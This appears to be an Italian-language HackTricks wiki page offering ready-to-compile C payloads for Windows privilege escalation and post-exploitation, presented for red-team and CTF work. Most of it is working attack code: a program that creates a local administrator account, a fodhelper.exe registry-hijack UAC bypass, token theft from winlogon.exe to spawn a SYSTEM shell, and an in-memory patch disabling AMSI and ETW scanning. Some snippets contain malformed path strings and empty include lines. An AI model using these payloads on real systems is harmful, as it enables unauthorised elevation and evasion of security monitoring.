# Windows C Payloads {{#include ../../banners/hacktricks-training.md}} Questa pagina raccoglie **piccoli snippet C autonomi** utili durante Windows Local Privilege Escalation o post-exploitation. Ogni payload è progettato per essere **facile da copiare/incollare**, richiede solo la Windows API / C runtime, e può essere compilato con `i686-w64-mingw32-gcc` (x86) o `x86_64-w64-mingw32-gcc` (x64). > ⚠️ Questi payload presumono che il processo abbia già i privilegi minimi necessari per eseguire l'azione (ad es. `SeDebugPrivilege`, `SeImpersonatePrivilege`, o contesto a integrità media per un UAC bypass). Sono destinati a contesti **red-team o CTF** dove lo sfruttamento di una vulnerabilità ha permesso l'esecuzione arbitraria di codice nativo. --- ## Aggiungi utente amministratore locale ```c // i686-w64-mingw32-gcc -s -O2 -o addadmin.exe addadmin.c #include int main(void) { system("net user hacker Hacker123! /add"); system("net localgroup administrators hacker /add"); return 0; } ``` --- ## UAC Bypass – `fodhelper.exe` Registry Hijack (Medium → High integrity) Quando il binario trusted **`fodhelper.exe`** viene eseguito, interroga il percorso di registro seguente **senza filtrare il verbo `DelegateExecute`**. Piantando il nostro comando sotto quella chiave, un attaccante può bypassare UAC *senza* scrivere un file su disco. *Percorso del registro interrogato da `fodhelper.exe`* ``` HKCU\Software\Classes\ms-settings\Shell\Open\command ``` Un PoC minimale che apre un `cmd.exe` con privilegi elevati: ```c // x86_64-w64-mingw32-gcc -municode -s -O2 -o uac_fodhelper.exe uac_fodhelper.c #define _CRT_SECURE_NO_WARNINGS #include #include #include #include int main(void) { HKEY hKey; const char *payload = "C:\\Windows\\System32\\cmd.exe"; // change to arbitrary command // 1. Create the vulnerable registry key if (RegCreateKeyExA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\Shell\\Open\\command", 0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL) == ERROR_SUCCESS) { // 2. Set default value => our payload RegSetValueExA(hKey, NULL, 0, REG_SZ, (const BYTE*)payload, (DWORD)strlen(payload) + 1); // 3. Empty "DelegateExecute" value = trigger (") RegSetValueExA(hKey, "DelegateExecute", 0, REG_SZ, (const BYTE*)"", 1); RegCloseKey(hKey); // 4. Launch auto-elevated binary system("fodhelper.exe"); } return 0; } ``` *Testato su Windows 10 22H2 e Windows 11 23H2 (patch di luglio 2025). Il bypass funziona ancora perché Microsoft non ha corretto il controllo di integrità mancante nel percorso `DelegateExecute`.* --- ## Avviare una shell SYSTEM tramite duplicazione del token (`SeDebugPrivilege` + `SeImpersonatePrivilege`) Se il processo corrente possiede **entrambi** i privilegi `SeDebug` e `SeImpersonate` (tipico per molti account di servizio), puoi rubare il token da `winlogon.exe`, duplicarlo e avviare un processo elevato: ```c // x86_64-w64-mingw32-gcc -O2 -o system_shell.exe system_shell.c -ladvapi32 -luser32 #include #include #include DWORD FindPid(const wchar_t *name) { PROCESSENTRY32W pe = { .dwSize = sizeof(pe) }; HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (snap == INVALID_HANDLE_VALUE) return 0; if (!Process32FirstW(snap, &pe)) return 0; do { if (!_wcsicmp(pe.szExeFile, name)) { DWORD pid = pe.th32ProcessID; CloseHandle(snap); return pid; } } while (Process32NextW(snap, &pe)); CloseHandle(snap); return 0; } int wmain(void) { DWORD pid = FindPid(L"winlogon.exe"); if (!pid) return 1; HANDLE hProc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid); HANDLE hToken = NULL, dupToken = NULL; if (OpenProcessToken(hProc, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &hToken) && DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &dupToken)) { STARTUPINFOW si = { .cb = sizeof(si) }; PROCESS_INFORMATION pi = { 0 }; if (CreateProcessWithTokenW(dupToken, LOGON_WITH_PROFILE, L"C\\\\Windows\\\\System32\\\\cmd.exe", NULL, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } } if (hProc) CloseHandle(hProc); if (hToken) CloseHandle(hToken); if (dupToken) CloseHandle(dupToken); return 0; } ``` Per una spiegazione più approfondita di come funziona, vedi: {{#ref}} sedebug-+-seimpersonate-copy-token.md {{#endref}} --- ## In-Memory AMSI & ETW Patch (Defence Evasion) La maggior parte dei moderni AV/EDR si affidano a **AMSI** e **ETW** per ispezionare comportamenti maligni. Patching di entrambe le interfacce all'interno del processo corrente, in fase iniziale, impedisce che payloads basati su script (es. PowerShell, JScript) vengano scansionati. ```c // gcc -o patch_amsi.exe patch_amsi.c -lntdll #define _CRT_SECURE_NO_WARNINGS #include #include void Patch(BYTE *address) { DWORD oldProt; // mov eax, 0x80070057 ; ret (AMSI_RESULT_E_INVALIDARG) BYTE patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; VirtualProtect(address, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProt); memcpy(address, patch, sizeof(patch)); VirtualProtect(address, sizeof(patch), oldProt, &oldProt); } int main(void) { HMODULE amsi = LoadLibraryA("amsi.dll"); HMODULE ntdll = GetModuleHandleA("ntdll.dll"); if (amsi) Patch((BYTE*)GetProcAddress(amsi, "AmsiScanBuffer")); if (ntdll) Patch((BYTE*)GetProcAddress(ntdll, "EtwEventWrite")); MessageBoxA(NULL, "AMSI & ETW patched!", "OK", MB_OK); return 0; } ``` *La patch sopra è a livello di processo; avviando un nuovo PowerShell dopo averla eseguita verrà eseguito senza ispezione AMSI/ETW.* --- ## Creare un processo figlio come Protected Process Light (PPL) Richiedere un livello di protezione PPL per un processo figlio al momento della creazione usando `STARTUPINFOEX` + `PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL`. Questa è un'API documentata e avrà successo solo se l'immagine target è firmata per la classe di signer richiesta (Windows/WindowsLight/Antimalware/LSA/WinTcb). ```c // x86_64-w64-mingw32-gcc -O2 -o spawn_ppl.exe spawn_ppl.c #include int wmain(void) { STARTUPINFOEXW si = {0}; PROCESS_INFORMATION pi = {0}; si.StartupInfo.cb = sizeof(si); SIZE_T attrSize = 0; InitializeProcThreadAttributeList(NULL, 1, 0, &attrSize); si.lpAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrSize); InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrSize); DWORD lvl = PROTECTION_LEVEL_ANTIMALWARE_LIGHT; // choose the desired level UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL, &lvl, sizeof(lvl), NULL, NULL); if (!CreateProcessW(L"C\\\Windows\\\System32\\\notepad.exe", NULL, NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi)) { // likely ERROR_INVALID_IMAGE_HASH (577) if the image is not properly signed for that level return 1; } DeleteProcThreadAttributeList(si.lpAttributeList); HeapFree(GetProcessHeap(), 0, si.lpAttributeList); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return 0; } ``` Livelli usati più comunemente: - `PROTECTION_LEVEL_WINDOWS_LIGHT` (2) - `PROTECTION_LEVEL_ANTIMALWARE_LIGHT` (3) - `PROTECTION_LEVEL_LSA_LIGHT` (4) Valida il risultato con Process Explorer/Process Hacker controllando la colonna Protection. --- ## Riferimenti * Ron Bowes – “Fodhelper UAC Bypass Deep Dive” (2024) * SplinterCode – “AMSI Bypass 2023: The Smallest Patch Is Still Enough” (BlackHat Asia 2023) * CreateProcessAsPPL – launcher minimale per processi PPL: https://github.com/2x7EQ13/CreateProcessAsPPL * Microsoft Docs – STARTUPINFOEX / InitializeProcThreadAttributeList / UpdateProcThreadAttribute {{#include ../../banners/hacktricks-training.md}}